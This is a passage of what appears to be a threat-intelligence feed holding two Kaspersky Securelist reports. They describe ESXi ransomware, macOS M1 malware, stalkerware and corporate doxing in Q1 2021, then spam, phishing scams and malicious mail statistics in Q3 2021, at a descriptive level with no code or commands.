\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/05122816/01-en-ru-fake-adshield-miner-diagram.png>)\n\n### Ransomware encrypting virtual hard disks\n\nRansomware gangs are exploiting vulnerabilities in VMware ESXi to target virtual hard disks and encrypt the data stored on them. The ESXi hypervisor lets multiple virtual machines store information on a single server using the SLP (Service Layer Protocol).\n\nThe first vulnerability ([CVE-2019-5544](<https://www.vmware.com/security/advisories/VMSA-2019-0022.html>)) can be used to carry out [heap overflow attacks](<https://encyclopedia.kaspersky.com/glossary/heap-overflow-attack/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). The second ([CVE-2020-3992](<https://www.vmware.com/security/advisories/VMSA-2020-0023.html>)) is a [Use-After-Free (UAF) vulnerability](<https://encyclopedia.kaspersky.com/glossary/use-after-free/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) related to the incorrect use of dynamic memory during program operation. Once attackers have been able to gain an initial foothold in the target network, they can use the vulnerabilities to generate malicious SLP requests and compromise data storage.\n\nThe vulnerabilities are being exploited by [RansomExx](<https://www.kaspersky.com/blog/ransomware-in-virtual-environment/39150/>). The [Darkside](<https://www.infosecurity-magazine.com/news/darkside-20-ransomware-fastest/>) group is reportedly using the same approach; and the attackers behind the [BabuLocker Trojan](<https://twitter.com/campuscodi/status/1354237766285012992>) have also hinted that they are able to encrypt ESXi.\n\n### macOS developments\n\nTowards the end of last year, Apple unveiled machines powered by its own M1 chip, designed to replace Intel's processors in its computers. 
The Apple M1, a direct relative of the processors used in the iPhone and iPad, will ultimately allow Apple to unify its software under a single architecture.\n\nJust a few months after the release of the first Apple M1 computers, malware writers had already recompiled their code to adapt it to the new architecture.\n\nThese include the developers of XCSSET, malware [first discovered last year](<https://www.trendmicro.com/en_us/research/20/h/xcsset-mac-malware--infects-xcode-projects--uses-0-days.html>), which targets Mac developers by injecting a malicious payload into Xcode IDE projects on the victim's Mac. This payload is subsequently executed during the building of project files in Xcode. XCSSET modules are able to read and dump Safari cookies, inject malicious JavaScript code into various websites, steal files and information from applications such as Notes, WeChat, Skype, Telegram and others, and encrypt files. The samples we have observed include some compiled specifically for the Apple Silicon chips.\n\nSilver Sparrow is [another new threat](<https://redcanary.com/blog/clipping-silver-sparrows-wings/>) that targets the M1 chip. This malware introduces a new way for malware writers to abuse the default packaging functionality: instead of placing a malicious payload inside pre-install or post-install scripts, they hid one in the Distribution XML file. This payload uses JavaScript API to run bash commands in order to download a JSON configuration file. The sample extracts a URL from the "downloadURL" field for the next download. An appropriate Launch Agent is also created for persistent execution of the malicious sample. The JavaScript payload can be executed regardless of chip architecture, but analysis of the package file makes it clear that it supports both Intel and M1 chips.\n\nMost malicious objects detected for the macOS platform are adware. 
The developers of these programs, including the Pirrit and Bnodlero families, are also updating their code to support the M1 chip.\n\nYou can find technical details, along with our FAQ on M1 threats, [here](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).\n\nCybercriminals don't just add support for new platforms: sometimes they use new programming languages to develop their 'products'. Recently, macOS adware developers have been paying more attention to new languages, apparently in the hope that such code will be more opaque to virus analysts who have little or no experience with the newer languages. We have already seen quite a few samples written in Go, and recently cybercriminals have turned their attention to Rust as well. You can read our analysis of a new adware program called Convuster [here](<https://securelist.com/convuster-macos-adware-in-rust/101258/>).\n\n### Secondhand news\n\nThere's a strong market in secondhand computing devices. Some of our researchers recently looked at [the security implications of buying and selling secondhand devices](<https://www.kaspersky.com/blog/data-on-used-devices/38610/>): their aim was to see what traces are left behind on laptops and other storage devices when people sell them.\n\nThe overwhelming majority of the devices we investigated contained at least some traces of data \u2013 mostly personal but some corporate. Researchers were able to access data on more than 16% of the devices outright. A further 74% contained data that could be recovered using [file-carving](<https://en.wikipedia.org/wiki/File_carving>) methods. Only 11% of devices had been wiped properly.\n\nThe data recovered ranged from the harmless to the revealing and even dangerous: calendar entries, meeting notes, access data for corporate resources, internal business documents, personal photos, medical information, tax documents and more. 
Some of the data could be used directly \u2013 for example, contact information, tax documents and medical records (or access to them through saved passwords). Other data could lead to indirect damage if exploited by cybercriminals.\n\nAside from the data that could be exposed, there's also a risk that malware left on a device could infect the new owner. We found malware on 17% of the devices we looked at.\n\nSellers need to consider what traces they might leave behind when they sell a device; and buyers need to think about the security of any secondhand device they buy.\n\nThe UK National Cyber Security Centre (NCSC) provides good [practical advice for buyers and sellers](<https://www.ncsc.gov.uk/guidance/buying-selling-second-hand-devices>).\n\n### Stalkerware during the pandemic\n\n[Stalkerware](<https://csr.kaspersky.com/en/antistalking/eng.html>) is commercially available software used to spy on another person via their device, without that person's knowledge or consent. Stalkerware is the digital tip of a very real-world iceberg. In a 2017 report, the European Institute for Gender Equality indicates that seven out of 10 women affected by online stalking have experienced physical violence at the hands of the perpetrator. The [Coalition Against Stalkerware](<https://stopstalkerware.org/>) defines stalkerware as software which "may facilitate intimate partner surveillance, harassment, abuse, stalking, and/or violence".\n\nThe number of people affected by stalkerware has been growing in recent years. We saw a fall in numbers in 2020, the drop-off coinciding with the worldwide lockdowns that came in the wake of the COVID-19 pandemic. This is hardly surprising: since stalking is typically carried out by someone the target lives with, if both abuser and target are housebound, there is less need to use technology to track someone's activities. Notwithstanding the _relative_ decline, 53,870 is a big number. 
Moreover, these are numbers of Kaspersky customers: no doubt the real figure is considerably higher.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/26124943/01-en-stalkerware-report.png>)The most commonly detected stalkerware sample in 2020 was Monitor.AndroidOS.Nidb.a. This app is re-sold under other names, so it is prominent in the market \u2013 iSpyoo, TheTruthSpy and Copy9 apps are all part of this family. Another popular application is Cerberus, which is sold as anti-theft smartphone protection and hides itself to avoid notice. Like genuine phone-finding apps, Cerberus has access to geo-location, can take photos and screenshots and record sound. Other high-ranking stalking apps include Track My Phone (which we detect as Agent.af), MobileTracker and Anlost.\n\n**Top 10 most detected stalkerware samples globally**\n\n| Samples | Affected users \n---|---|--- \n1 | Monitor.AndroidOS.Nidb.a | 8147 \n2 | Monitor.AndroidOS.Cerberus.a | 5429 \n3 | Monitor.AndroidOS.Agent.af | 2727 \n4 | Monitor.AndroidOS.Anlost.a | 2234 \n5 | Monitor.AndroidOS.MobileTracker.c | 2161 \n6 | Monitor.AndroidOS.PhoneSpy.b | 1774 \n7 | Monitor.AndroidOS.Agent.hb | 1463 \n8 | Monitor.AndroidOS.Cerberus.b | 1310 \n9 | Monitor.AndroidOS.Reptilic.a | 1302 \n10 | Monitor.AndroidOS.SecretCam.a | 1124 \n \nThe greatest number of stalkerware detections occurred in Russia, Brazil and the US.\n\n**Top 10 most affected countries by stalkerware \u2013 globally**\n\n| Country | Affected users \n---|---|--- \n1 | Russian Federation | 12389 \n2 | Brazil | 6523 \n3 | United States of America | 4745 \n4 | India | 4627 \n5 | Mexico | 1570 \n6 | Germany | 1547 \n7 | Iran | 1345 \n8 | Italy | 1144 \n9 | United Kingdom | 1009 \n10 | Saudi Arabia | 968 \n \nYou can read our full report on the subject [here](<https://securelist.com/the-state-of-stalkerware-in-2020/100875/>).\n\nStalkerware operates stealthily, so it's difficult for anyone targeted with such programs to see that 
it's installed on their device \u2013 they hide the app's icon and remove other traces of their presence.\n\nKaspersky is actively working to end the use of stalkerware, not just by detecting it but by working with partners. In 2019, Kaspersky and nine other founding members created the [Coalition Against Stalkerware](<https://stopstalkerware.org/>). Last year, we created [TinyCheck](<https://github.com/KasperskyLab/TinyCheck>), a free tool to detect stalkerware on mobile devices \u2013 specifically for service organizations working with people facing domestic violence. We are one of five partners in an EU-wide project aimed at tackling gender-based cyber-violence and stalkerware called DeStalk, which the European Commission chose to support with its Rights, Equality and Citizenship Program.\n\n### Doxing in the corporate sector\n\nWhen most people think of [doxing](<https://encyclopedia.kaspersky.com/glossary/doxxing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), they tend to think it applies only to celebrities and other high-profile people. However, confidential corporate information is no less sensitive; and the financial and reputational impact resulting from the disclosure of such data means that any organization could become a victim of doxing. This is clear, for example, from the fact that several ransomware gangs now threaten to leak stolen corporate data to increase the likelihood that their victims will pay up.\n\nCybercriminals use a variety of methods to gather confidential corporate information.\n\nOne of the easiest approaches is to use open-source intelligence (OSINT) \u2013 that is, gathering data from publicly accessible sources. 
The internet provides a lot of helpful information to would-be attackers, including the names and positions of employees, among them those who occupy key positions in the company: for example, the CEO, HR director and chief financial officer.\n\nInformation harvested from the online personal profiles of employees can be used to set up [BEC](<https://encyclopedia.kaspersky.com/glossary/bec/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (Business Email Compromise) attacks, in which an attacker initiates email correspondence with a member of staff by posing as a different employee (including their superior) or as a representative of a partner company. The attacker does this to gain the trust of the target before persuading them to perform certain actions, such as sending confidential data or transferring funds to an account controlled by the attacker.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26124957/Corporate_doxing_01.png>)\n\nBEC attacks can also be used to collect further information about the company, or to gain access to valuable corporate data or company resources \u2013 for example, credentials allowing access to cloud-based systems.\n\nThere are various technical tricks that cybercriminals use to obtain information relevant to their particular goals, including sending [email messages containing a tracking pixel](<https://www.kaspersky.com/blog/tracking-pixel-bec/36976/>) \u2013 often disguised as a "test" message.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125040/Corporate_doxing_02.png>)\n\nThis enables attackers to obtain data such as the time the email was opened, the version of the recipient's mail client and the IP address. This data lets the attackers build a profile on a specific person whom they can then impersonate in subsequent attacks.\n\nPhishing continues to be an effective way for attackers to gather corporate data. 
For example, they may send an employee a message that mimics a notification from a business platform such as SharePoint, which contains a link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/26125148/Corporate_doxing_04.jpg>)\n\nIf the employee clicks the link, they are redirected to a spoofed website containing a fraudulent form for entering their corporate account credentials \u2013 data which is captured by the attackers.\n\nSometimes cybercriminals resort to phone phishing \u2013 either by calling an employee directly and trying to "phish" corporate information, or sending a message and asking them to call the number given in the message. One way to trick employees is to pose as IT support staff \u2013 this method was used in the [Twitter hack](<https://www.dfs.ny.gov/Twitter_Report>) in July 2020.\n\n> By obtaining employee credentials, they were able to target specific employees who had access to our account support tools. They then targeted 130 Twitter accounts - Tweeting from 45, accessing the DM inbox of 36, and downloading the Twitter Data of 7.\n> \n> -- Twitter Support (@TwitterSupport) [July 31, 2020](<https://twitter.com/TwitterSupport/status/1289000208701878272?ref_src=twsrc%5Etfw>)\n\nAttackers may not confine themselves to gathering publicly available data, but may also hack an employee's account. This could be used to gain a foothold in the company, from which they can extend their activities, or to circulate false information that could damage the company's reputation and result in financial loss. 
There has even been a case where cybercriminals have obtained audio and video content of the CEO of an international company and [used deepfake technology to imitate the CEO's voice](<https://www.kaspersky.com/blog/machine-learning-fake-voice/28870/>), using it to persuade the management team of one of the company's branches to transfer money to the scammers.\n\nYou can read our full report on doxing, including tips on how to protect yourself, [here](<https://securelist.com/corporate-doxing/101513/>).", "cvss3": {}, "published": "2021-05-31T10:00:37", "type": "securelist", "title": "IT threat evolution Q1 2021", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-5544", "CVE-2020-3992", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-05-31T10:00:37", "id": "SECURELIST:A823F31C04C74DD103337324E6D218C9", "href": "https://securelist.com/it-threat-evolution-q1-2021/102382/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. 
Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n"Nigerian prince" scammers also had a close eye on Q3's sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. 
To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. 
It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. 
Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. This quarter, for example, saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded from such platforms. 
The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which then removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. 
In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for a government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. 
The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. 
and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. 
Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. 
The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. 
compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. 
Financial services (1.81%), IT companies (1.72%) and telecommunication companies (1.45%) round out the ranking.\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn Q3 2021, Safe Messaging blocked 117,854 attempted redirects via phishing links in various messengers. Of these, 106,359 links (90.25%) were detected and blocked in WhatsApp messages. Viber accounted for 5.68%, Telegram for 3.74% and Google Hangouts for 0.02% of all detected links.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131830/11-en-spam-report-q3.png>))_\n\nOn WhatsApp, Safe Messaging detected an average of 900 phishing links per day during the quarter. There was a surge in scamming activity in this period, though \u2014 on July 12\u201316 the system blocked more than 4,000 links a day. This spike coincided with an increase in detections of the Trojan.AndroidOS.Whatreg.b Trojan, which registers new WhatsApp accounts from infected devices. 
We cannot say for sure what exactly these accounts get up to and whether they have anything to do with the rise in phishing on WhatsApp, but it is possible that cybercriminals use them for spamming.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132007/Spam_report_Q3_2021_18.png>)\n\n**_Dynamics of phishing activity on WhatsApp, Q3 2021_**\n\nAs for Telegram, phishing activity there increased slightly towards the end of the quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29132044/Spam_report_Q3_2021_19.png>)\n\n**_Dynamics of phishing activity on Telegram, Q3 2021_**\n\n## Takeaways\n\nNext quarter, we can expect Christmas- and New Year-themed mailings. Ahead of the festive season, many people make purchases from online stores, a fact exploited by cybercriminals. Anonymous fake stores taking money for non-existent or substandard goods are likely to be a popular scamming method during this period. Also beware of fraudulent copies of big-name trading platforms \u2014 such sites traditionally mushroom ahead of the festive frenzy. Corporate users too should remain sharp-eyed \u2014 even a congratulatory e-mail seemingly from a partner may be phishing for confidential information.\n\nThe COVID-19 topic will still be hot in the next quarter. The fourth wave of the pandemic, vaccinations and the introduction of COVID passports in many countries will surely give rise to new malicious mailings. 
